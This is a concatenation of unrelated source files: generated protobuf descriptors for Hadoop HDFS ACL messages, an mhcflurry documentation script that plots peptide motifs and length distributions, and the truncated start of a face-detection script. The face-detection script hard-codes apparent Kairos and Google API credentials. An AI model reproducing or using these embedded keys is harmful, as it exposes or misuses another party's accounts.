name='permissions', full_name='hadoop.hdfs.AclEntryProto.permissions', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='hadoop.hdfs.AclEntryProto.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO,
_ACLENTRYPROTO_ACLENTRYTYPEPROTO,
_ACLENTRYPROTO_FSACTIONPROTO,
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=39,
serialized_end=491,
)
_ACLSTATUSPROTO = _descriptor.Descriptor(
name='AclStatusProto',
full_name='hadoop.hdfs.AclStatusProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='owner', full_name='hadoop.hdfs.AclStatusProto.owner', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group', full_name='hadoop.hdfs.AclStatusProto.group', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sticky', full_name='hadoop.hdfs.AclStatusProto.sticky', index=2,
number=3, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entries', full_name='hadoop.hdfs.AclStatusProto.entries', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permission', full_name='hadoop.hdfs.AclStatusProto.permission', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=494,
serialized_end=653,
)
_MODIFYACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesRequestProto',
full_name='hadoop.hdfs.ModifyAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=655,
serialized_end=743,
)
_MODIFYACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesResponseProto',
full_name='hadoop.hdfs.ModifyAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=745,
serialized_end=776,
)
_REMOVEACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclRequestProto',
full_name='hadoop.hdfs.RemoveAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=778,
serialized_end=814,
)
_REMOVEACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclResponseProto',
full_name='hadoop.hdfs.RemoveAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=816,
serialized_end=840,
)
_REMOVEACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesRequestProto',
full_name='hadoop.hdfs.RemoveAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=842,
serialized_end=930,
)
_REMOVEACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesResponseProto',
full_name='hadoop.hdfs.RemoveAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=932,
serialized_end=963,
)
_REMOVEDEFAULTACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclRequestProto',
full_name='hadoop.hdfs.RemoveDefaultAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveDefaultAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=965,
serialized_end=1008,
)
_REMOVEDEFAULTACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclResponseProto',
full_name='hadoop.hdfs.RemoveDefaultAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1010,
serialized_end=1041,
)
_SETACLREQUESTPROTO = _descriptor.Descriptor(
name='SetAclRequestProto',
full_name='hadoop.hdfs.SetAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.SetAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.SetAclRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1043,
serialized_end=1121,
)
_SETACLRESPONSEPROTO = _descriptor.Descriptor(
name='SetAclResponseProto',
full_name='hadoop.hdfs.SetAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1123,
serialized_end=1144,
)
_GETACLSTATUSREQUESTPROTO = _descriptor.Descriptor(
name='GetAclStatusRequestProto',
full_name='hadoop.hdfs.GetAclStatusRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.GetAclStatusRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1146,
serialized_end=1185,
)
_GETACLSTATUSRESPONSEPROTO = _descriptor.Descriptor(
name='GetAclStatusResponseProto',
full_name='hadoop.hdfs.GetAclStatusResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='result', full_name='hadoop.hdfs.GetAclStatusResponseProto.result', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1187,
serialized_end=1259,
)
_ACLENTRYPROTO.fields_by_name['type'].enum_type = _ACLENTRYPROTO_ACLENTRYTYPEPROTO
_ACLENTRYPROTO.fields_by_name['scope'].enum_type = _ACLENTRYPROTO_ACLENTRYSCOPEPROTO
_ACLENTRYPROTO.fields_by_name['permissions'].enum_type = _ACLENTRYPROTO_FSACTIONPROTO
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_ACLENTRYTYPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_FSACTIONPROTO.containing_type = _ACLENTRYPROTO;
_ACLSTATUSPROTO.fields_by_name['entries'].message_type = _ACLENTRYPROTO
_ACLSTATUSPROTO.fields_by_name['permission'].message_type = hdfs_pb2._FSPERMISSIONPROTO
_MODIFYACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_REMOVEACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_SETACLREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_GETACLSTATUSRESPONSEPROTO.fields_by_name['result'].message_type = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['AclEntryProto'] = _ACLENTRYPROTO
DESCRIPTOR.message_types_by_name['AclStatusProto'] = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesRequestProto'] = _MODIFYACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesResponseProto'] = _MODIFYACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclRequestProto'] = _REMOVEACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclResponseProto'] = _REMOVEACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesRequestProto'] = _REMOVEACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesResponseProto'] = _REMOVEACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclRequestProto'] = _REMOVEDEFAULTACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclResponseProto'] = _REMOVEDEFAULTACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['SetAclRequestProto'] = _SETACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['SetAclResponseProto'] = _SETACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusRequestProto'] = _GETACLSTATUSREQUESTPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusResponseProto'] = _GETACLSTATUSRESPONSEPROTO
class AclEntryProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _ACLENTRYPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.AclEntryProto)
class AclStatusProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _ACLSTATUSPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.AclStatusProto)
class ModifyAclEntriesRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _MODIFYACLENTRIESREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.ModifyAclEntriesRequestProto)
class ModifyAclEntriesResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _MODIFYACLENTRIESRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.ModifyAclEntriesResponseProto)
class RemoveAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclRequestProto)
class RemoveAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclResponseProto)
class RemoveAclEntriesRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLENTRIESREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclEntriesRequestProto)
class RemoveAclEntriesResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEACLENTRIESRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveAclEntriesResponseProto)
class RemoveDefaultAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEDEFAULTACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveDefaultAclRequestProto)
class RemoveDefaultAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _REMOVEDEFAULTACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.RemoveDefaultAclResponseProto)
class SetAclRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _SETACLREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.SetAclRequestProto)
class SetAclResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _SETACLRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.SetAclResponseProto)
class GetAclStatusRequestProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _GETACLSTATUSREQUESTPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.GetAclStatusRequestProto)
class GetAclStatusResponseProto(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _GETACLSTATUSRESPONSEPROTO
# @@protoc_insertion_point(class_scope:hadoop.hdfs.GetAclStatusResponseProto)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), '\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\240\001\001')
# @@protoc_insertion_point(module_scope)
| 0 | 2,885 | 322 |
af81ed36e1f1184d64fb2de2e30627cacf0e71cb | 8,288 | py | Python | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | 1 | 2020-01-01T23:06:01.000Z | 2020-01-01T23:06:01.000Z | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | null | null | null | docs/generate_class1_pan.py | eyeshoe/mhcflurry | b87aac3cf1a782cb1235f9b724388bbdd933d9fb | [
"Apache-2.0"
] | null | null | null | """
Generate certain RST files used in documentation.
"""
from __future__ import print_function
import sys
import argparse
from collections import OrderedDict, defaultdict
import os
from os.path import join, exists
from os import mkdir
import pandas
import logomaker
from matplotlib import pyplot
from mhcflurry.downloads import get_path
from mhcflurry.amino_acid import COMMON_AMINO_ACIDS
AMINO_ACIDS = sorted(COMMON_AMINO_ACIDS)
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument(
"--class1-models-dir-with-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.with_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--class1-models-dir-no-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.no_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--logo-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for motifs",
)
parser.add_argument(
"--length-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for length distribution",
)
parser.add_argument(
"--length-distribution-lengths",
nargs="+",
default=[8, 9, 10, 11, 12, 13, 14, 15],
type=int,
help="Peptide lengths for length distribution plots",
)
parser.add_argument(
"--motif-lengths",
nargs="+",
default=[8, 9, 10, 11],
type=int,
help="Peptide lengths for motif plots",
)
parser.add_argument(
"--out-dir",
metavar="DIR",
required=True,
help="Directory to write RSTs and images to",
)
parser.add_argument(
"--max-alleles",
default=None,
type=int,
metavar="N",
help="Only use N alleles (for testing)",
)
if __name__ == "__main__":
go(sys.argv[1:])
| 30.470588 | 89 | 0.628016 | """
Generate certain RST files used in documentation.
"""
from __future__ import print_function
import sys
import argparse
from collections import OrderedDict, defaultdict
import os
from os.path import join, exists
from os import mkdir
import pandas
import logomaker
from matplotlib import pyplot
from mhcflurry.downloads import get_path
from mhcflurry.amino_acid import COMMON_AMINO_ACIDS
AMINO_ACIDS = sorted(COMMON_AMINO_ACIDS)
parser = argparse.ArgumentParser(usage=__doc__)
parser.add_argument(
"--class1-models-dir-with-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.with_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--class1-models-dir-no-ms",
metavar="DIR",
default=get_path(
"models_class1_pan", "models.no_mass_spec", test_exists=False),
help="Class1 models. Default: %(default)s",
)
parser.add_argument(
"--logo-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for motifs",
)
parser.add_argument(
"--length-cutoff",
default=0.01,
type=float,
help="Fraction of top to use for length distribution",
)
parser.add_argument(
"--length-distribution-lengths",
nargs="+",
default=[8, 9, 10, 11, 12, 13, 14, 15],
type=int,
help="Peptide lengths for length distribution plots",
)
parser.add_argument(
"--motif-lengths",
nargs="+",
default=[8, 9, 10, 11],
type=int,
help="Peptide lengths for motif plots",
)
parser.add_argument(
"--out-dir",
metavar="DIR",
required=True,
help="Directory to write RSTs and images to",
)
parser.add_argument(
"--max-alleles",
default=None,
type=int,
metavar="N",
help="Only use N alleles (for testing)",
)
def model_info(models_dir):
    """
    Load the summary CSV artifacts stored alongside a trained predictor.

    Parameters
    ----------
    models_dir : str
        Directory expected to contain length_distributions.csv.bz2,
        frequency_matrices.csv.bz2 and train_data.csv.bz2.

    Returns
    -------
    dict with keys:
      * 'length_distributions': the length-distribution table as read.
      * 'normalized_frequency_matrices': the frequency-matrix table with
        each amino-acid column divided by a background distribution.
      * 'observations_per_allele': allele name -> number of unique
        training peptides.
    """
    length_distributions_df = pandas.read_csv(
        join(models_dir, "length_distributions.csv.bz2"))
    frequency_matrices_df = pandas.read_csv(
        join(models_dir, "frequency_matrices.csv.bz2"))
    train_data_df = pandas.read_csv(
        join(models_dir, "train_data.csv.bz2"))
    # Background amino-acid distribution: mean per-residue frequency over
    # rows with cutoff_fraction == 1.0 (presumably the "all peptides"
    # rows — confirm against how frequency_matrices.csv.bz2 is written).
    distribution = frequency_matrices_df.loc[
        (frequency_matrices_df.cutoff_fraction == 1.0), AMINO_ACIDS
    ].mean(0)
    normalized_frequency_matrices = frequency_matrices_df.copy()
    # Divide every row by the background so values express enrichment
    # relative to random peptides rather than raw frequency.
    normalized_frequency_matrices.loc[:, AMINO_ACIDS] = (
        normalized_frequency_matrices[AMINO_ACIDS] / distribution)
    observations_per_allele = (
        train_data_df.groupby("allele").peptide.nunique().to_dict())
    return {
        'length_distributions': length_distributions_df,
        'normalized_frequency_matrices': normalized_frequency_matrices,
        'observations_per_allele': observations_per_allele,
    }
def write_logo(
        normalized_frequency_matrices,
        allele,
        lengths,
        cutoff,
        models_label,
        out_dir):
    """
    Render one sequence-logo panel per peptide length for an allele and
    save the figure as a PNG in out_dir.

    Returns the image file's basename (not full path), or None if any
    requested length has no rows for this allele/cutoff.

    NOTE(review): the early `return None` exits mid-loop without closing
    the figure created above, leaking it in long runs — confirm intended.
    """
    fig = pyplot.figure(figsize=(8,10))
    for (i, length) in enumerate(lengths):
        # One stacked subplot per peptide length.
        ax = pyplot.subplot(len(lengths), 1, i + 1)
        matrix = normalized_frequency_matrices.loc[
            (normalized_frequency_matrices.allele == allele) &
            (normalized_frequency_matrices.length == length) &
            (normalized_frequency_matrices.cutoff_fraction == cutoff)
        ].set_index("position")[AMINO_ACIDS]
        if matrix.shape[0] == 0:
            return None
        matrix = (matrix.T / matrix.sum(1)).T  # row normalize
        ss_logo = logomaker.Logo(
            matrix,
            width=.8,
            vpad=.05,
            fade_probabilities=True,
            stack_order='small_on_top',
            ax=ax,
        )
        pyplot.title(
            "%s %d-mer (%s)" % (allele, length, models_label), y=0.85)
        pyplot.xticks(matrix.index.values)
    pyplot.tight_layout()
    # '*' and ':' are invalid/awkward in filenames, so sanitize the allele.
    name = "%s.motifs.%s.png" % (
        allele.replace("*", "-").replace(":", "-"), models_label)
    filename = os.path.abspath(join(out_dir, name))
    pyplot.savefig(filename)
    print("Wrote: ", filename)
    # Explicitly release the figure to keep memory flat over many alleles.
    fig.clear()
    pyplot.close(fig)
    return name
def write_length_distribution(
        length_distributions_df, allele, lengths, cutoff, models_label, out_dir):
    """
    Render a bar chart of the predicted peptide-length distribution for an
    allele and save it as a PNG in out_dir.

    Returns the image file's basename (not full path), or None if the
    table has no rows for this allele/cutoff.
    """
    length_distribution = length_distributions_df.loc[
        (length_distributions_df.allele == allele) &
        (length_distributions_df.cutoff_fraction == cutoff)
    ]
    if length_distribution.shape[0] == 0:
        return None
    # Reindex so every requested length appears on the x-axis, with 0.0
    # filled in for lengths absent from the table.
    length_distribution = length_distribution.set_index(
        "length").reindex(lengths).fillna(0.0).reset_index()
    fig = pyplot.figure(figsize=(8, 2))
    # NOTE(review): DataFrame.plot creates its own axes, so the figsize
    # above may not govern the final image — confirm rendered size.
    length_distribution.plot(x="length", y="fraction", kind="bar", color="black")
    pyplot.title("%s (%s)" % (allele, models_label))
    pyplot.xlabel("")
    pyplot.xticks(rotation=0)
    pyplot.gca().get_legend().remove()
    # '*' and ':' are invalid/awkward in filenames, so sanitize the allele.
    name = "%s.lengths.%s.png" % (
        allele.replace("*", "-").replace(":", "-"), models_label)
    filename = os.path.abspath(join(out_dir, name))
    pyplot.savefig(filename)
    print("Wrote: ", filename)
    # Explicitly release the figure to keep memory flat over many alleles.
    fig.clear()
    pyplot.close(fig)
    return name
def go(argv):
    """
    Entry point: parse command-line args, load per-predictor model info,
    render the length-distribution and motif images for every allele, and
    write the combined RST document (allele_motifs.rst) into --out-dir.
    """
    args = parser.parse_args(argv)
    if not exists(args.out_dir):
        mkdir(args.out_dir)
    # (label, models_dir) pairs; a falsy dir disables that predictor.
    predictors = [
        ("with_mass_spec", args.class1_models_dir_with_ms),
        ("no_mass_spec", args.class1_models_dir_no_ms),
    ]
    info_per_predictor = OrderedDict()
    alleles = set()
    for (label, models_dir) in predictors:
        if not models_dir:
            continue
        info_per_predictor[label] = model_info(models_dir)
        # Union of alleles across predictors so the document covers both.
        alleles.update(
            info_per_predictor[label]["normalized_frequency_matrices"].allele.unique())
    lines = []
    # Small helper: append one or more RST lines to the output buffer.
    def w(*pieces):
        lines.extend(pieces)
    w('Motifs and length distributions from the pan-allele predictor')
    w('=' * 80, "")
    w(
        "Length distributions and binding motifs were calculated by ranking a "
        "large set of random peptides (an equal number of peptides for each "
        "length 8-15) by predicted affinity for each allele. "
        "For length distribution, the top %g%% of peptides were collected and "
        "their length distributions plotted. For sequence motifs, sequence "
        "logos for the top %g%% "
        "peptides for each length are shown.\n" % (
            args.length_cutoff * 100.0,
            args.logo_cutoff * 100.0,
        ))
    w(".. contents:: :local:", "")
    # Helper: wrap an image basename in an RST image directive; empty
    # string when the image was not generated (name is None).
    def image(name):
        if name is None:
            return ""
        return '.. image:: %s\n' % name
    # Sort with HLA alleles first, then alphabetically within each group.
    alleles = sorted(alleles, key=lambda a: ("HLA" not in a, a))
    if args.max_alleles:
        alleles = alleles[:args.max_alleles]
    for allele in alleles:
        w(allele, "-" * 80, "")
        for (label, info) in info_per_predictor.items():
            length_distribution = info["length_distributions"]
            normalized_frequency_matrices = info["normalized_frequency_matrices"]
            length_distribution_image_path = write_length_distribution(
                length_distributions_df=length_distribution,
                allele=allele,
                lengths=args.length_distribution_lengths,
                cutoff=args.length_cutoff,
                out_dir=args.out_dir,
                models_label=label)
            # No length-distribution data implies nothing to show for this
            # allele/predictor pair; skip the whole section.
            if not length_distribution_image_path:
                continue
            w(
                "*" + (
                    "With mass-spec" if label == "with_mass_spec" else "Affinities only")
                + "*\n")
            w("Training observations (unique peptides): %d" % (
                info['observations_per_allele'].get(allele, 0)))
            w("\n")
            w(image(length_distribution_image_path))
            w(image(write_logo(
                normalized_frequency_matrices=normalized_frequency_matrices,
                allele=allele,
                lengths=args.motif_lengths,
                cutoff=args.logo_cutoff,
                out_dir=args.out_dir,
                models_label=label,
            )))
            w("")
    document_path = join(args.out_dir, "allele_motifs.rst")
    with open(document_path, "w") as fd:
        for line in lines:
            fd.write(line)
            fd.write("\n")
    print("Wrote", document_path)
go(sys.argv[1:])
| 6,353 | 0 | 92 |
8052c6f74b616a1d0ff9897edcd89cb694062362 | 25,872 | py | Python | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | face_detector/face_detector_google3.py | michaelmurdock/py_ml_projects | fbfaa6e6b10f413f8810b642d2e6144f18e163a0 | [
"BSD-2-Clause"
] | null | null | null | # face_detector_google3.py
#
# This version expects a source folder containing folders of images,
# as you get with the LFW distribution.
# Each folder is named for one person and that folder should contain
# only photos of that person.
#
# Environment Variable: GOOGLE_APPLICATION_CREDENTIALS
# C:\pyDev\__My Scripts\face_detector_google\Face-Detection-3dc1b370d617.json
from __future__ import print_function
"""Draws squares around faces in the given image."""
import sys
import os
import os.path
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0, parent_dir)
from mcm_lib2 import exception_utils as eu
from mcm_lib2 import fname as fnm
from mcm_lib2 import files_and_folders as ff
from mcm_lib2 import enum as en
import argparse
import base64
import json
import fnmatch
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from PIL import Image
from PIL import ImageDraw
import numpy as np
import kairos_face
# SECURITY NOTE(review): live Kairos and Google API credentials are hard-coded
# in source. They should be loaded from environment variables or an untracked
# config file, and these keys rotated, before this file is shared further.
kairos_face.settings.app_id = "56aab423"
kairos_face.settings.app_key = "faa3e1412c97b3171dd7dcda3382313a"
# Half-width in pixels of the markers drawn at detected face landmarks —
# presumably consumed by the drawing code below; confirm against callers.
RADIUS = 2
# Google Cloud Vision API key, passed to discovery.build(developerKey=...).
API_KEY = 'AIzaSyD3HsHlSOrQXhmqjpph9R9Di1pl_4WVNEY'
def get_list_of_matching_files(root_dir, image_ext_tuple):
    '''
    Returns a list of full paths of files found under the sub-folders of
    root_dir whose names match one of the glob patterns in image_ext_tuple.
    Example tuple: ('*.jpg', '*.jpeg', '*.j2k', '*.png')

    Note: files sitting directly in root_dir (not inside a sub-folder) are
    intentionally not returned — with the LFW layout every image lives in a
    per-person sub-folder.
    '''
    matching_files = []
    # Iterate over each per-person entry directly under root_dir.
    for entry in os.listdir(root_dir):
        person_dir = os.path.join(root_dir, entry)
        # os.walk() on a non-directory yields nothing, so plain files in
        # root_dir are skipped without an explicit isdir() check.
        for walk_root, _subdirs, files in os.walk(person_dir):
            for pattern in image_ext_tuple:
                for filename in fnmatch.filter(files, pattern):
                    # Join against walk_root (not person_dir) so files in
                    # nested sub-folders get their correct full path.
                    matching_files.append(os.path.join(walk_root, filename))
    return matching_files
def save_as_json(d, full_json_filename):
    '''
    Serialize d as pretty-printed JSON and write it to full_json_filename.

    Returns a (success, error_message) tuple; error_message is '' on success.
    '''
    try:
        serialized = json.dumps(d, indent=4)
    except Exception as e:
        return (False, 'Exception in save calling json.dumps. Details: %s' % (str(e)))
    try:
        with open(full_json_filename, "w") as text_file:
            text_file.write("%s" % (serialized))
    except Exception as e:
        return (False, 'Exception in save() writing to output file: %s. Details: %s' % (full_json_filename, str(e)))
    return (True, '')
def get_elipse_bounding_box(x, y, radius):
    '''
